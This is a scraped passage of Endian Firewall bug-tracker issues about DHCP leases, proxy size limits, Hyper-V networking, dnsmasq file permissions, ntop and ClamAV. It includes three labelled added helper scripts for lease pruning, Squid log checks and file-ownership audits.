Hi Lo,

I have tried re-entering the configuration and saving settings but an old lease is still shown. Here is my dhcpd.conf, minus the fixed leases I have set up:

******dhcpd.conf******

ddns-update-style none;
deny bootp;
authoritative;
option wpad code 252 = text;



shared-network GREEN {
    interface br0;
    server-identifier 10.1.1.1;
    subnet 10.1.1.0 netmask 255.255.255.0 {
        pool {
            deny dynamic bootp clients;
            range 10.1.1.50 10.1.1.60;
        }
        default-lease-time 3600;
        max-lease-time 7200;
        option subnet-mask 255.255.255.0;
          option domain-name "GMAR";
          option routers 10.1.1.1;
          option wpad "http://10.1.1.1/proxy.pac";
          option domain-name-servers 10.1.1.1;

******dhcpd.conf******

As you can see, the max lease time is 120 minutes. After 120 minutes the lease still appears on this page, but the "Lease expires (local time d/m/y)" column shows the time stamp struck through. See screenshot attached.
(0005293)
lorenzo-endian   
2010-12-03 13:27   
Hi gmar_87,

I can confirm that the leases stay there even when expired; I think that this aspect should be improved :-)

Thanks for providing this hint to us!

Lo
(0008535)
Anonymous   
2013-09-24 09:04   
Hi guys, to clear the DHCP lease information just remove the files "dhcp lease" and "dhcp lease~" in "/var/lib/dhcp" and refresh the web interface....
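Added example, not part of the thread and not Endian's code: a sketch of the retention option requested in this issue, which parses an ISC dhcpd.leases file, reports leases that expired more than a chosen period ago, and produces a pruned copy. The function names and the sample leases are constructed for illustration; it assumes dhcpd's default UTC date format.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample in ISC dhcpd.leases syntax (not taken from the thread).
# dhcpd appends to this file, so one address can appear several times and
# the last block for an address is the current one.
SAMPLE_LEASES = """\
lease 10.1.1.50 {
  starts 2 2010/08/03 09:00:00;
  ends 2 2010/08/03 10:00:00;
  binding state free;
  hardware ethernet 00:11:22:33:44:55;
  client-hostname "old-laptop";
}
lease 10.1.1.51 {
  starts 3 2010/11/24 08:30:00;
  ends 3 2010/11/24 09:30:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:66;
}
lease 10.1.1.51 {
  starts 3 2010/11/24 09:00:00;
  ends 3 2010/11/24 10:00:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:66;
}
lease 10.1.1.52 {
  starts 1 2010/11/22 12:00:00;
  ends never;
  binding state active;
  hardware ethernet 00:11:22:33:44:77;
}
"""

# A lease block runs from "lease <ip> {" to a "}" at the start of a line.
LEASE_RE = re.compile(r"^lease\s+(\S+)\s*\{(.*?)^\}", re.S | re.M)
STMT_RE = re.compile(
    r"^\s*(starts|ends|binding state|hardware ethernet|client-hostname)"
    r"\s+(.*?);\s*$", re.M)


def parse_time(value):
    """Parse '<weekday> YYYY/MM/DD HH:MM:SS' (UTC); 'never' gives None."""
    if value == "never":
        return None
    _weekday, date, clock = value.split()
    stamp = datetime.strptime(f"{date} {clock}", "%Y/%m/%d %H:%M:%S")
    return stamp.replace(tzinfo=timezone.utc)


def parse_leases(text):
    """Return {ip: record}, keeping only the last block seen per address."""
    leases = {}
    for ip, body in LEASE_RE.findall(text):
        rec = {"ip": ip, "ends": None}
        for key, val in STMT_RE.findall(body):
            rec[key] = val.strip('"')
        for key in ("starts", "ends"):
            if rec.get(key) is not None:
                rec[key] = parse_time(rec[key])
        leases[ip] = rec
    return leases


def expired_leases(leases, now, keep=timedelta(0)):
    """Leases that ended more than `keep` before `now`, oldest first."""
    cutoff = now - keep
    hits = [r for r in leases.values()
            if r["ends"] is not None and r["ends"] < cutoff]
    return sorted(hits, key=lambda r: r["ends"])


def prune(text, now, keep):
    """Return the lease file text without any block of a stale address.

    dhcpd rewrites the lease file from memory, so a pruned copy should only
    replace the original while the daemon is stopped.
    """
    stale = {r["ip"] for r in expired_leases(parse_leases(text), now, keep)}
    return LEASE_RE.sub(
        lambda m: "" if m.group(1) in stale else m.group(0), text)


if __name__ == "__main__":
    now = datetime(2010, 11, 24, 12, 0, tzinfo=timezone.utc)
    one_week = timedelta(weeks=1)
    for rec in expired_leases(parse_leases(SAMPLE_LEASES), now, one_week):
        print(rec["ip"], rec.get("hardware ethernet"), rec["ends"].isoformat())
```

With a retention of one week only the August lease is reported; the lease that ended two hours earlier is kept, and "ends never" entries are never treated as expired.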





View Issue Details
4574 [Endian Firewall] Proxy HTTP major always 2013-09-22 10:11 2013-09-22 19:50
BT  
 
urgent  
new 2.5  
open  
none    
none  
   
HTTPS connections with Endian Firewall 2.5.2
Hello,
I'm using Endian Firewall 2.5.2 Community Edition. I use transparent proxy mode; if I try an HTTPS site it does not open, for example https://www.google.com, and trying to watch a YouTube video fails.

My Hardware Config
Intel i5 3210
2 GB Ram
Red(PPPoe)+Green(Local Lan) Interface
Notes
(0008534)
bogdan1   
2013-09-22 19:50   
Hello BT

In transparent mode HTTPS traffic doesn't go through the proxy and can't be filtered.
It had to be allowed in the outgoing firewall, but the real problem is that Google recently activated automatic redirection from HTTP to HTTPS.

Regards
Bogdan





View Issue Details
2914 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature always 2010-05-23 17:37 2013-09-21 01:59
deepthought  
 
normal  
new 2.3  
open  
none    
none  
   
Hyper-V Network-Drivers Support
Support for Hyper-V native "Network Adapter", works currently only with mind-bogglingly slow "Legacy Network Adapter", max throughput approx 10 MBit
Running efw virtualized might not be the suggested way, but somehow keeps coming I guess. See: http://endian-forum.de/index.php?page=Thread&postID=85#post85 (in German). Beside me there seem to be more users who would appreciate running an efw instance as Hyper-V Guest OS.
Notes
(0006640)
marioeirea   
2011-06-08 05:04   
I'm there with you, it would help a lot in our environment. Currently we can only get about 12 Mbps through the legacy network adapter. Endian 2.4.1 has kernel 2.6.32 which has the integration components, maybe this feature can be enabled?
(0006696)
baldy   
2011-06-09 21:02   
Drivers for linux are available from Microsoft.

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=eee39325-898b-4522-9b4c-f4b5b9b64551&displaylang=en

Regards,

Klaas-Jan
(0006722)
thehinac   
2011-06-15 06:22   
Not currently any decent firewalls for hyper-v, and it works great in a guest os at work and home. The only solution is Endian with legacy network adapter, but 12Mbs is :(. Can integration components be turned on or have the Microsoft drivers installed? That would make my year.
(0006723)
thehinac   
2011-06-15 06:23   
Is this going to be possible?
(0006729)
marioeirea   
2011-06-15 15:02   
(edited on: 2011-06-15 15:08)
I have tried installing the integration components in the past but I just can't get them to compile on the system. When trying to install/compile I get lots of dependency errors for packages I can't find on the development RPMs.

Another thing I forgot to mention in the original post. When traffic on the legacy adapter approaches 12mbps, sometimes the adapter will lose connection. At this point I have to cycle eth0 (ifconfig eth0 up/down) to bring it back.

(0007086)
BonezAU   
2011-07-26 01:59   
We are also running Endian in Hyper-V with 70 users... the speed and throughput is really really bad. It's becoming a big problem now.

Anyone know how I can get integration services working so I can use the real ethernet adapter?

Running 2.3 with 2.6.32.26-57.e40.i586
(0007237)
gsimms   
2011-08-02 23:26   
I also have a customer who is requesting to run endian within a Hyper V server. Is this supported yet in 2.4 enterprise?
(0007260)
deepthought   
2011-08-03 16:22   
@thehinac: Smartass. Setting the issue to "feedback" (which is: feedback by the submitter) is SURELY a great way of drawing their attention to this one... Argh.
(0007848)
marioeirea   
2012-04-28 06:28   
Any chance of including the drivers on the PAE kernel at least?
(0007861)
Danoh   
2012-05-10 14:55   
Any word on this? The speed limit of 10 mbit on the legacy hyperv network adapters is BAD. We need integration support for hyperv
(0008533)
deepthought   
2013-09-21 01:59   
Dear Endians, according to my calendar, >1y passed. This timespan is commonly known as "wontfix". Am I right? If that's the case, I kick out your stuff and buy something from <<hereBeDifferentVendor>>.





View Issue Details
4571 [Endian Firewall] Proxy - HTTP minor always 2013-09-18 09:09 2013-09-20 09:12
spewk  
 
normal  
new 2.5  
open  
none    
none  
   
Slow HTTPS connections with Endian Firewall 2.5.2
Hi all,
after updating 3 installations of Endian Firewall from version 2.5.1 to 2.5.2, I'm experiencing really slow connections to HTTPS sites.
I can experience this both with Windows XP and Windows 7, using Internet Explorer 8, 9 or 10.
I didn't have this problem with 2.5.1.

Some clients are strangely not affected by this problem, but I haven't found any clue (they're using the same content filter, same firewall rules, same Internet Explorer config).

For example, if I try to connect to www.microsoft.com via HTTP it takes 3 seconds to have the full page displayed; if I try the HTTPS version it needs 20 seconds!

My configuration:
Endian firewall 2.5.2 on VMware ESXi 4.1, with 2 CPUs and 2 GB RAM. 2 of them have the RED on Ethernet static, the other one is configured in Gateway mode.
AD Joined proxy with some sites open to everyone (no login) on Squid and other ones with AD groups + Dansguardian rules

The problem is occurring with both the "no login" and Dansguardian sites

Daniele
Notes
(0008531)
luca-endian   
2013-09-20 09:08   
maybe a proxy.pac wpad.dat problem?
(0008532)
spewk   
2013-09-20 09:12   
They're not using any configuration script, just the manual proxy settings on IE (deployed via GPO)
Daniele





View Issue Details
4441 [Endian Firewall] Proxy HTTP block always 2012-08-29 11:28 2013-09-20 09:00
ardit-endian  
 
normal  
new 2.5  
open  
none    
none  
   
Proxy Maximum upload/download size not working
When we set the limit, for example 6000 / 6000 or 10000 / 10000 which actually means 10MB, the bigger files are blocked correctly; however, no webpage could be visited, not even light ones like google.com
Reproduced with 2.5; to reproduce, just set the limits and try to navigate.
I didn't notice anything relevant in the logs except a warning:
2012/08/29 12:26:52| WARNING: No units on 'request_body_max_size 10000KB', assuming 10000.000000 bytes

which actually doesn't say much.

A customer reproduced this on different firewalls; actually he didn't have this issue with 2.4
Notes
(0008522)
lboni2   
2013-09-14 16:27   
Good morning! Please, I have this same problem (EFW 2.5.2). I wonder if there is a fix for this bug. Or at least, how I could make a manual correction. Can I edit the squid.conf file directly? Thank you, Luciano.
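The warning quoted in the report above shows Squid applying 10000 bytes for a setting written as 10000KB. The script below is an added example, not part of the report or of Endian's code: it scans cache.log text for that warning and prints the value Squid applied next to the value the suffix suggests. Sample lines 2 and 3 are constructed, and the conversion (KB, MB, GB as powers of 1024) is an assumption.

```shell
#!/bin/sh
# Added example (not from the report): find Squid size settings whose unit
# suffix was ignored, using the "No units" warning in cache.log.

# Sample input. Line 1 is the warning quoted in the report; lines 2 and 3
# are constructed for this example.
sample_log() {
cat <<'EOF'
2012/08/29 12:26:52| WARNING: No units on 'request_body_max_size 10000KB', assuming 10000.000000 bytes
2012/08/29 12:26:52| Ready to serve requests.
2012/08/29 12:30:10| WARNING: No units on 'request_body_max_size 6000KB', assuming 6000.000000 bytes
EOF
}

# Reads log text on stdin. For each warning prints one line:
#   <directive> <token as configured> <bytes Squid applied> <bytes the suffix suggests>
# Assumption: KB/MB/GB are powers of 1024; an unknown suffix is reported as 0.
squid_unit_warnings() {
    awk '
    /WARNING: No units on / {
        q1 = index($0, "\047")                 # opening quote
        if (q1 == 0) next
        rest = substr($0, q1 + 1)
        q2 = index(rest, "\047")               # closing quote
        if (q2 == 0) next
        if (split(substr(rest, 1, q2 - 1), f, " ") < 2) next
        tail = substr(rest, q2 + 1)
        if (match(tail, /assuming [0-9]+/) == 0) next
        applied = substr(tail, RSTART + 9, RLENGTH - 9)

        num = f[2]; sub(/[^0-9].*$/, "", num)  # leading digits of the token
        if (num == "") next
        suffix = toupper(substr(f[2], length(num) + 1))
        mult = 0
        if (suffix == "")   mult = 1
        if (suffix == "KB") mult = 1024
        if (suffix == "MB") mult = 1024 * 1024
        if (suffix == "GB") mult = 1024 * 1024 * 1024
        printf "%s %s %s %.0f\n", f[1], f[2], applied, num * mult
    }'
}

# Stand-alone run on the sample; on a firewall pipe the real cache.log instead.
sample_log | squid_unit_warnings
```

A large gap between the third and fourth column means the limit in force is far smaller than the one entered in the GUI.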





View Issue Details
4270 [Endian Firewall] Proxy HTTP minor always 2012-02-05 16:22 2013-09-20 09:00
tradermail-enupdate  
 
normal  
acknowledged 2.5  
open  
none    
none  
   
'Maximum download size' proxy setting does not work
Setting a value in 'Maximum download size (incoming in KB)' under Proxy > Configuration > Proxy Settings does not work

I have looked in the '/etc/squid/squid.conf.tmpl' file and it looks like there may be a bug in the configuration.

reply_body_max_size ${MAX_INCOMING_SIZE}KB allow from_all

I was able to get the 'Maximum download size' working by changing the line to

reply_body_max_size ${MAX_INCOMING_SIZE} allow from_all

Then entering the value in the GUI as bytes not KB
Notes
(0008523)
lboni2   
2013-09-14 16:30   
Good morning! Please, I have this same problem (version 2.5.2). I wonder if there is a fix for this bug. Or at least, how I could make a manual correction. Can I edit the squid.conf file directly? Thank you, Luciano.
(0008525)
luca-endian   
2013-09-17 14:25   
the bug description includes the manual fix





View Issue Details
4563 [Endian Firewall] Endian Firewall GUI major always 2013-08-28 23:03 2013-09-19 22:28
msoliveira01  
luca-endian  
immediate  
new 2.5  
open  
none    
none  
   
The antispyware service cannot be disabled in the GUI, nor can the white/black list be edited
The new antispyware feature cannot be disabled on version 2.5.2 through the GUI. When we try to save the modifications or disable the service, all we can see is a white screen trying to apply the modifications.
The interface only comes back if we refresh the page, but the modifications are not applied.
The problem is that a lot of URLs in the black list are listed as phishing, like www.bradesco.com.br, which is a bank web site.
Proxy -> DNS ->anti-spyware
Endian 2.5.2.jpg (122,141) 2013-08-28 23:03
https://bugs.endian.com/file_download.php?file_id=1055&type=bug
Notes
(0008483)
luca-endian   
2013-08-29 08:00   
can you please verify the permissions of /var/efw/dnsmasq/settings ?
They should be like this:
-rw-r--r-- 1 nobody nobody 405 Aug 6 10:27 settings
(0008486)
luca-endian   
2013-08-29 08:25   
(edited on: 2013-08-29 08:26)
BTW I'm not sure I would trust this bank :D
http://www.phishtank.com/phish_detail.php?phish_id=1976608

Actually we block domains that have a confirmed phish in their root directory, and this is the case actually..

If you are sure 100% the bank is safe (phishtank says not :) ) you could whitelist

(0008499)
msoliveira01   
2013-08-29 16:39   
it works! the permission was -rw-r--r-- 1 root root
(0008503)
luca-endian   
2013-08-30 09:05   
ok so it's a permission problem..
(0008507)
carlos-endian   
2013-09-02 11:06   
Issue reported and will be fixed soon; when it is ready we will inform you.
Thanks for your help
(0008526)
luca-endian   
2013-09-17 14:55   
msoliveira01 we can't reproduce this.. did you upgrade it or install from scratch?
and if you install did you restore a backup?
(0008527)
luca-endian   
2013-09-17 14:56   
someone else experienced this issue?
(0008528)
msoliveira01   
2013-09-17 17:47   
Hello Luca,
I upgraded it from version 2.4.1
(0008529)
josegjimenez   
2013-09-19 22:28   
Hello, I have solved the problem by looking from the web console on the firewall:

Log in as root and go to the path cd /var/efw/dnsmasq
Run ls -l and you will see the permissions of each module

there you should see something like this:

-rw-r--r-- 1 nobody nobody blackholedns.custom
-rw-r--r-- 1 nobody nobody blackholedns.ignore
drwxr-xr-x 2 nobody nobody default
-rw-r--r-- 1 nobody nobody destination_bypass
-rw-r--r-- 1 nobody nobody empty
-rw-r--r-- 1 nobody nobody hosts
-rw-r--r-- 1 nobody nobody local_nameserver
-rw-r--r-- 1 root root settings
-rw-r--r-- 1 nobody nobody settings.old

For some reason our settings file became owned by root, but don't worry: from the console, in the path /var/efw/dnsmasq, we run mv settings settings.back, which renames root's settings, and then we rename nobody's settings (ours) with mv settings.old settings

automatically we can now use the dns proxy of our great firewall
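The notes above trace the failure to /var/efw/dnsmasq/settings being owned by root instead of nobody. The script below is an added example, not Endian code: it reads an "ls -l" listing and reports every entry whose owner or group differs from the expected pair. The function name audit_owner is made up for this example; the sample input is the listing from the last note.

```shell
#!/bin/sh
# Added example (not Endian code): flag entries in an "ls -l" listing whose
# owner or group differs from the expected one.

# The listing as posted in the note above (sizes and dates were already
# left out there; the function copes with full "ls -l" lines as well).
sample_listing() {
cat <<'EOF'
-rw-r--r-- 1 nobody nobody blackholedns.custom
-rw-r--r-- 1 nobody nobody blackholedns.ignore
drwxr-xr-x 2 nobody nobody default
-rw-r--r-- 1 nobody nobody destination_bypass
-rw-r--r-- 1 nobody nobody empty
-rw-r--r-- 1 nobody nobody hosts
-rw-r--r-- 1 nobody nobody local_nameserver
-rw-r--r-- 1 root root settings
-rw-r--r-- 1 nobody nobody settings.old
EOF
}

# usage: ls -l DIR | audit_owner USER GROUP
# Prints "<name> <owner>:<group>" for every mismatch and returns 1 if any
# was found, 0 otherwise. Names containing spaces are not handled.
audit_owner() {
    awk -v user="$1" -v group="$2" '
    NF < 5 { next }                          # "total N" header, blank lines
    {
        name = $NF
        if ($1 ~ /^l/ && NF >= 7) name = $(NF - 2)   # symlink: "name -> target"
        if ($3 != user || $4 != group) { print name, $3 ":" $4; bad++ }
    }
    END { exit (bad > 0) }'
}

# Stand-alone run on the sample; on the firewall use:
#   ls -l /var/efw/dnsmasq | audit_owner nobody nobody
sample_listing | audit_owner nobody nobody || echo "ownership differs from nobody:nobody"
```

Run after an upgrade or a backup restore, the check catches the drift before the GUI fails to save its changes.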





View Issue Details
4572 [Endian Firewall] Hardware related (kernel, drivers, hardware) block always 2013-09-19 10:10 2013-09-19 10:10
epiphany  
 
normal  
new 2.5  
open  
none    
none  
   
Error Reading Target Device
Hello,
I have a problem installing on a congatec mainboard! The installation always says "Error reading target device"; after clicking "OK" it says: "HArddisk to small"! I think the endian installation does not know the chipset of the congatec mainboard. Can somebody help to fix the error?

Thanks
There are no notes attached to this issue.





View Issue Details
4449 [Endian Firewall] QoS minor always 2012-09-04 02:17 2013-09-12 08:10
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Qos Device Name Changed When Edit Existing Entry
When tried to edit existing QoS entry, i.e. VLAN ID tagged BLUE zone, device name changed to VPN IPSEC after saved.
version 2.5.1
Qos Issue 4.jpg (154,404) 2012-09-04 02:17
https://bugs.endian.com/file_download.php?file_id=983&type=bug
Notes
(0008225)
omriasta   
2012-10-05 16:22   
noticed this behavior as well
(0008521)
mhLearn   
2013-09-12 08:10   
happens on v 2.5.2 too.





View Issue Details
4570 [Endian Firewall] Network related (VPN, uplinks) minor always 2013-09-11 05:54 2013-09-11 05:54
mhLearn  
 
normal 2.5.2  
new  
open  
none    
none  
   
PPPoE Connection Hard To Establish
After upgrade to v2.5.2, once the connection was down, it was very hard to connect back. Sometimes, it took more than an hour to connect again.
It was upgraded from 2.5.1 to 2.5.2, and no change was made to the PPPoE settings.
PPPoE Connection Log.txt (15,773) 2013-09-11 05:54
https://bugs.endian.com/file_download.php?file_id=1059&type=bug
There are no notes attached to this issue.





View Issue Details
4569 [Endian Firewall] Endian Firewall minor have not tried 2013-09-06 12:40 2013-09-06 12:40
jcvn  
 
normal  
new 2.5  
open  
none    
none  
   
CBQ does not boot with the system.
CBQ does not boot with the system. I attempted to boot it via /etc/rc.d/rc.ipac by entering the command cbq start on the last line before exit 0, without success.
There are no notes attached to this issue.





View Issue Details
4566 [Endian Firewall] Installation major always 2013-09-02 09:29 2013-09-05 22:44
davvidde ESXi 3.5  
3.5.0 build 988599  
normal  
new 2.5  
open  
none    
none  
   
Hang on installation
Endian 2.5.1 and 2.5.2 hangs on install. If I change to shell ALT+2 I notice the loop on detecting hardware. I also tried with Boot:nousborpcmcia but the result was the same.
Install from iso file
endian_loop.JPG (123,380) 2013-09-02 09:45
https://bugs.endian.com/file_download.php?file_id=1056&type=bug
Notes
(0008506)
davvidde   
2013-09-02 09:53   
(edited on: 2013-09-02 09:54)
The problem is present also in 2.4.1. In version 2.2 I am able to install but upgrade failed with efw-upgrade

(0008513)
davvidde   
2013-09-05 22:44   
Here http://www.efwsupport.com/index.php?topic=2474.msg6662#msg6662 is posted a possible workaround solution to install the distro.





View Issue Details
4567 [Endian Firewall] Proxy - HTTP minor always 2013-09-02 13:17 2013-09-02 13:17
baldy  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.2 CE Squid Zero Sized Reply
After upgrading some 2.5.1 CE systems to 2.5.2 CE Squid is no longer retrieving webpages but instead reports a zero sized reply (screenshot attached)

To solve this problem the Squid cache needs to be cleared via Proxy-Cache Management - Clear Cache
2.5.1 CE with manual proxy enabled, contentfiltering and virusscanning are also active.
zerosized.jpg (20,650) 2013-09-02 13:17
https://bugs.endian.com/file_download.php?file_id=1057&type=bug
There are no notes attached to this issue.





View Issue Details
4562 [Endian Firewall] Other Scripts minor always 2013-08-25 10:06 2013-08-30 09:09
svoelker Endian Firewall Community 2.5.2  
luca-endian  
normal 2.5.2  
confirmed 2.5  
open  
none    
none  
   
SMART Package Manager Error - SHA256 / Hashlib Python not working.
Since the update to 2.5.2 the Smart Package manager does not work anymore with SHA256 checksums; this also appears on a fresh 2.5.2 install from iso.

With Endian 2.5.1 everything is working as intended.
Add a repo channel with SHA256 signed rpms.

for example:
smart channel --add CentOS6.2 type=rpm-md name="CentOS6.2" \
baseurl="http://vault.centos.org/6.2/os/i386/" components=base

then run:
smart update

it crashes when it tries to update the repo cache database.
Traceback (most recent call last):
  File "/usr/bin/smart", line 200, in ?
    main(sys.argv[1:])
  File "/usr/bin/smart", line 173, in main
    exitcode = iface.run(opts.command, opts.argv)
  File "/usr/lib/python2.4/site-packages/smart/interface.py", line 53, in run
    result = _command.main(self._ctrl, opts)
  File "/usr/lib/python2.4/site-packages/smart/commands/update.py", line 82, in main
    failed = not ctrl.reloadChannels(channels, caching=NEVER)
  File "/usr/lib/python2.4/site-packages/smart/control.py", line 388, in reloadChannels
    if not channel.fetch(self._fetcher, progress):
  File "/usr/lib/python2.4/site-packages/smart/channels/rpm_md.py", line 287, in fetch
    fetcher.run(progress=progress)
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 253, in run
    if not handler.tick():
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 1596, in tick
    withreason=True)
  File "/usr/lib/python2.4/site-packages/smart/fetcher.py", line 408, in validate
    from smart.util.sha256 import sha256
ImportError: No module named sha256
Notes
(0008493)
svoelker   
2013-08-29 12:43   
no one an idea ? :)
(0008494)
luca-endian   
2013-08-29 14:07   
seems that the python module is missing.. never found out, probably, because our channels (even enterprise) are not signed with sha256
(0008495)
svoelker   
2013-08-29 15:17   
Is there any way to hotfix this?
I'd even do it myself :)

but it's weird, because in 2.5.1 everything was working.

Since 2.5.2 it does not anymore.
(0008496)
carlos-endian   
2013-08-29 15:52   
The python module sha256 is not present in community 2.5.2; I have tested in enterprise and all works fine.

At this moment CentOS 6.2 is not compatible with our distribution.

On enterprise:
Fetching information for 'CentOS6.2'...
-> http://vault.centos.org/6.2/os/i386/repodata/repomd.xml
repomd.xml ########################################################################################## [ 68%]
-> http://vault.centos.org/6.2/os/i386/repodata/0664ff4efbfd4a759077eac6039a5b1a8ddec69b630fc92604a3a693347a043d-filelists.xml.gz
-> http://vault.centos.org/6.2/os/i386/repodata/db23b7c71bacbe9ad01047445ca3636d33777f5a4cabfd7cd3ce99204bde6e58-primary.xml.gz
db23b7c71bacbe9ad01047445ca3636d33777f5a4cabfd7cd3ce99204bde6.. ########################################################################################## [ 75%]
0664ff4efbfd4a759077eac6039a5b1a8ddec69b630fc92604a3a693347a0.. ########################################################################################## [ 81%]

Updating cache... ########################################################################################## [100%]

Channels have 4764 new packages.
Saving cache...
(0008497)
svoelker   
2013-08-29 15:55   
ye I know it's not compatible, it was just an example.

but we got other distributions that are compatible and use sha256 signed rpms

but without working sha256 it's hard to customize.

and I won't touch the python setup, that destroys it all :)
(0008498)
svoelker   
2013-08-29 15:56   
community edition that is.
(0008504)
luca-endian   
2013-08-30 09:08   
we'll see what we can do





View Issue Details
3492 [Endian Firewall] Other Services minor always 2011-02-22 11:47 2013-08-29 19:39
luca-endian  
luca-endian  
normal  
feedback 2.4.1  
reopened  
none    
none  
   
no support for untagged packets
Currently there is no support for untagged IEEE 802.1Q packets if on the interface there is already a tagged interface.

Ex.
eth0.1 vlan 1
eth0.2 vlan 2

but you can't use any more eth0
Notes
(0008500)
luca-endian   
2013-08-29 16:54   
actually I've contradicted myself..
from what I found it's the Linux implementation that doesn't support untagged together with tagged :|
(0008501)
Luca Lesinigo   
2013-08-29 19:39   
Linux does support tagged + untagged 802.1Q VLANs just fine.





View Issue Details
4412 [Endian Firewall] Other Services minor always 2012-08-01 12:58 2013-08-27 07:16
barbalarga  
daniele-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
Traffic monitoring interface work for only some seconds
Endian version 2.5.1
After I've enabled the traffic monitoring it is possible to access the administrative interface immediately, but for only 30 or 40 seconds; then the browser shows the following error: "connection refused".
If I switch the traffic monitoring off and then on I can access the administrative interface for another 30/40 seconds and then get "connection refused" again.
The system access rules are ok.

Thank you, best regards.
Paolo
Notes
(0008299)
Anonymous   
2012-11-13 15:53   
I have the same issue
(0008435)
soportenalucho   
2013-06-06 22:25   
Any solution?
(0008444)
daniele-endian   
2013-07-12 11:02   
Hi guys,

please try with the following configuration

===========================================
root@endian:~ # cat /etc/ntop/ntop.conf.tmpl
--user ntop
--daemon
--db-file-path /var/ntop
--interface br0,br1,br2
--trace-level 3
--http-server 0
--https-server 3001
--ipv4
--max-table-rows 150
-x 1000

===========================================
Then do restartntop -f; the web interface with this config should be working fine
(0008473)
mhLearn   
2013-08-27 04:55   
above configuration or upgraded to v2.5.2 will solve the issue





View Issue Details
4415 [Endian Firewall] Other Services major always 2012-08-08 05:25 2013-08-27 07:16
mhLearn  
lorenzo-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
NTOP / Traffic Monitoring Is Not Working
On Endian Firewall 2.5.1.

The NTOP doesn't work even when Intrusion is turned off (some reported this issue may be due to Intrusion being turned on).
NTOP_Not Working.jpg (118,547) 2012-08-08 05:25
https://bugs.endian.com/file_download.php?file_id=972&type=bug
NTOP_Error.txt (22,010) 2012-10-24 08:46
https://bugs.endian.com/file_download.php?file_id=998&type=bug
Notes
(0008000)
lorenzo-endian   
2012-08-08 15:19   
hi mhLearn,

could this issue be the same described in the bug http://bugs.endian.com/view.php?id=4412 ?

thanks in advance!

Lo
(0008242)
mhLearn   
2012-10-19 09:34   
Hi Lo,

My case was worse: the traffic monitoring was not able to load, error message "unable to connect".

thx
mh
(0008243)
mhLearn   
2012-10-19 10:10   
Noticed some said the problem was solved after a while, e.g.
http://bugs.endian.com/view.php?id=4415

But, how?
(0008247)
mhLearn   
2012-10-24 08:48   
Just upload the log, hope someone can help to resolve the problem. I am new to this, don't understand the log.
(0008275)
mhLearn   
2012-11-08 11:40   
Installed efw on different computer and traffic monitoring was running perfectly on testing environment, i.e. pc <-> green zone switch <-> efw.

But after putting it in this environment,

    PCs <-> green zone switch, Orange/Blue router <-> efw <-> 2 Red zones

then it failed to work. Found this error message,

 **ERROR** mVLAN: Host (identical IP/MAC) found on multiple VLANs

What does this mean?
(0008390)
mhLearn   
2013-03-11 04:21   
For those that may be facing the same problem, I hope the below is useful to you.

1. Disable the Traffic monitoring.
2. Run ntop from shell
3. Access web through yourfirewall_ip:port. port can be 3000 or 3001.

Good luck
(0008436)
soportenalucho   
2013-06-06 22:26   
I have the same problem... any solution?
Thank you
(0008443)
daniele-endian   
2013-07-12 11:02   
Hi guys,

please try with the following configuration

===========================================
root@endian:~ # cat /etc/ntop/ntop.conf.tmpl
--user ntop
--daemon
--db-file-path /var/ntop
--interface br0,br1,br2
--trace-level 3
--http-server 0
--https-server 3001
--ipv4
--max-table-rows 150
-x 1000

===========================================
Then do restartntop -f; the web interface with this config should be working fine
(0008447)
ronin   
2013-07-19 20:11   
(edited on: 2013-07-20 01:42)
Daniele-endian, I have tried this config and it appears that it has not fixed the issue. ntop appears to be working for a short period of time and then the web interface times out. When it eventually comes back, stats are reset.
Any other suggestion would be appreciated.
Thx

UPDATE: This config seems to have made the problem worse, fwiw. Availability of the service is even less now. Virtually non-existent even after the restart of ntop

UPDATE-RESOLVED: It appears that if you modify the ntop option so that the web interface is accessible via HTTP rather than HTTPS, everything works fine

(0008458)
luca-endian   
2013-08-26 08:17   
Please try with 2.5.2
(0008467)
mhLearn   
2013-08-26 09:54   
it is working after changing according to the configuration provided by daniele-endian.
(0008471)
mhLearn   
2013-08-27 04:52   
it's working fine in 2.5.2
(0008474)
daniele-endian   
2013-08-27 07:15   
Ok, many thanks for the feedback. I close this bug.





View Issue Details
3527 [Endian Firewall] Other Services minor always 2011-03-09 10:09 2013-08-26 08:41
ardit-endian  
peter-endian  
normal  
resolved 2.4  
fixed  
none    
none  
   
Update clamav
[LibClamAV] ***********************************************************
[LibClamAV] *** This version of the ClamAV engine is outdated. ***
[LibClamAV] *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
[LibClamAV] ***********************************************************

2.4 full up to date.
There are no notes attached to this issue.





View Issue Details
4551 [Endian Firewall] Other Services minor always 2013-06-12 12:49 2013-08-26 08:39
baldy  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
2.5.1. CE ClamAV Engine needs to be updated.
ClamAV engine is outdated and needs to be updated.

[LibClamAV] ***********************************************************
[LibClamAV] *** This version of the ClamAV engine is outdated. ***
[LibClamAV] *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
[LibClamAV] ***********************************************************
Notes
(0008437)
baldy   
2013-06-12 12:54   
http://downloads.sourceforge.net/clamav/clamav-0.97.8.tar.gz
(0008442)
Neddy   
2013-07-11 09:28   
(edited on: 2013-07-11 09:28)
I wonder is there any method to upgrade ClamAV engine manually? A month later this issue isn't updated.

(0008464)
luca-endian   
2013-08-26 08:38   
fixed with 2.5.2





View Issue Details
4558 [Endian Firewall] Installation minor always 2013-08-05 17:05 2013-08-06 15:50
EDV-Team  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none 2.5  
   
Endian development channel not reachable when using efw-upgrade or smart update
When switching from Endian stable to development channel with efw-upgrade -s, the devel repository seems to be not reachable at the moment.

Here is the output of smart update:
---
#smart update
Loading cache...
Updating cache... ######################################## [100%]

Fetching information for 'efw-community'...
-> http://username@email.com:*@updates.endian.org/devel/.../repomd.xml
repomd.xml [ 25%]
error: Failed acquiring release file for 'efw-community':
error: http://username%40email.com:community@updates.endian.org/devel/repodata/repomd.xml: File not found
---

We need to use the Endian development channel to get our Intel i340 based network card to work.
So it would be nice if this could be fixed soon,

Thank you very much!
Notes
(0008449)
